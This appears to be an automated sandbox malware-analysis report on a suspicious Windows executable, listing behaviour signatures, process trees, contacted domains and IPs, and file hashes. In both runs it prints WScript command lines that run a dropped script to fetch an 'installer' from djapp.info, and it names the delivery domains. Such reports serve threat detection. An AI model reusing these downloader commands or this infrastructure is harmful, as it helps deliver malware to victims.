Analysis Overview
SHA256
251a196a6611a19878246b0ada11c4db277bcd25b58c2a8de6ae9fae113a8a89
Threat Level: Likely malicious
The file 91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 13:02
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 13:02
Reported
2024-06-03 13:05
Platform
win7-20240221-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6DD0.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 608
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf6DD0.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
| MD5 | 64369fef1b8498606c9f058a069e4a67 |
| SHA1 | e9ca6cb18521f68d60580fe06a976eae9a0080b0 |
| SHA256 | 1a9aaf80be461cf461926858d55687c37e64bfdca189548c91131753ae2e5e7f |
| SHA512 | 07c996106388cc7f4e74c2c1663bc81483ae39c93e70d8c15308c1f8d11b3ef24c4db6875f57ee2f2e9d5bcd7a8a2d76e5ccdf29f650a32cae57fe19393d50f2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8W3PDETZ.txt
| MD5 | 4f49c38907c96547eda06f4a5f190d18 |
| SHA1 | 4d1dac05c21c8d45996c03db5b6d8f55c4f48808 |
| SHA256 | 8b9db1405fb037a8f0483a2dd1820bbae29b19b1983a6f7a6ec1edb2c77c05bf |
| SHA512 | 5a71446f3cbb63b897d870c284b84e06451685f093e6a9f2f417230112cc138503ccc23903a97dda92c6b1fd41a7fe94d0402c2dde5ce86a3f2df7122102ca37 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3320dd63463e0108fcaecd3c50e4eb79 |
| SHA1 | d7af1d0cbfa2f7069aeac5ad8f3b5f676e13e549 |
| SHA256 | 168d3092885b2803133ea85025b66801f463af6422d96a85e8604e7615865f2c |
| SHA512 | 052c6f724b7b7c6d2b5c2398660180a3f29bd74328cd35fa23ae3579e39b242e1b067dc8e9f750f6c1f39311e5a08e8146d683470362e52a2032f7c488da5fac |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 8202a1cd02e7d69597995cabbe881a12 |
| SHA1 | 8858d9d934b7aa9330ee73de6c476acf19929ff6 |
| SHA256 | 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5 |
| SHA512 | 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
| MD5 | 72abe4a1b6512c443a8a481040130afc |
| SHA1 | 0c630b47c5211479e37c93a8b7241515a3b9a8d3 |
| SHA256 | 54245279f6544cf94887b48d0fb009f167e45d05aef11676ef9140178968efe9 |
| SHA512 | 79aaf19c2fe6e735b039f3b2d9200188c01837f095560867f30f88f56d5a21493761f486ba913072e6ffb5b0acdac64422e9e50501ddbfe140471c27d719659d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 13ed5e0369cedc64c8437eb9a493a981 |
| SHA1 | 880053c91809fef7b2a3d688143f554d5a05c0bd |
| SHA256 | 3560614f2f62c19498d2ad6c3b9fa8f232883167479de05e924a5a3ab19a8454 |
| SHA512 | 18b3c940a3b722b58c476af4141ab987ed9f7557c1e52f3f20548b2c209abd67c943761d22e20ed59c36d69f8cd911285aff7efdf2d20f51c35cad62932aefa0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
| MD5 | 9887eec51ccd9f25b0bff10391619e34 |
| SHA1 | 5f490df9c45edfca8e4767e24296e01ce1bc46a5 |
| SHA256 | b8759be34284f72075dddea1c8d97567ba32040c9332596565564503267a90be |
| SHA512 | 88d952f5daf944a78da5aa9efe46bde7bdb13fd8075938ee040b6c69b31ee8e85bfe7c10934efc77350dac88eca3e722e66fc662d63d45ab1bff2e76df3f3a93 |
C:\Users\Admin\AppData\Local\Temp\Cab9C6E.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
| MD5 | 3c6b0f404033916623eddaa124ce3909 |
| SHA1 | 59dfe27e5fed31c3fed5ab8f19cda4d3bae94e42 |
| SHA256 | 7415acbade83996cb86f812aea26c63d07273b33d90127138f769e904f3463d1 |
| SHA512 | 1a4e02d4ffcbc88fe537960887e1680662269c9e37b2dfd891e42149132be96e89b894138f82897e2a7d317415a83f8007d97dcd008af24384959c5241b516b3 |
C:\Users\Admin\AppData\Local\Temp\TarB74F.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm
| MD5 | 9cefdc77c5f0bc80398dbd8cf2e18a71 |
| SHA1 | 36785b45766e667782edfc51a950c79aec6afbd7 |
| SHA256 | 6f5c5a3474feba20eb15b4b23e6ee13eea5d4e4fe39f39b389eb28645cbbfbd2 |
| SHA512 | df75378c2089652df5972fe61ce757338e993b730400a393a6cc3f765326d807198899dc71009ff804aacfb3d1fe28c8c5267482cb9b23be3dfd8c33b8efea53 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm
| MD5 | 19cc0f5b83da7916f54d28d9a446e58d |
| SHA1 | 0f2caf2d4fba788b8a2144f2ddfdaa5e66351125 |
| SHA256 | 9b6b248ffa6faafaf1ae752962d192a331376f746bb9d7c3193093bfb863fa71 |
| SHA512 | f0e035946552a4e684e9080bcd53cef70ba27eaddff50ed034bad9221076332299f8575d060f0ae4b5492b2349f437f8fa510428cec81628b49af68680bb5c14 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 13:02
Reported
2024-06-03 13:05
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\91e18a3c89364d7fdd1c2a30098c327a_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf376B.js" http://www.djapp.info/?domain=bRIutVgNJf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf376B.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2408 -ip 2408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 1448
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 8.8.8.8:53 | 23.253.130.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 18.119.154.66:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 66.154.119.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 3.130.253.23:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf376B.js
| MD5 | 3813cab188d1de6f92f8b82c2059991b |
| SHA1 | 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb |
| SHA256 | a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e |
| SHA512 | 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76 |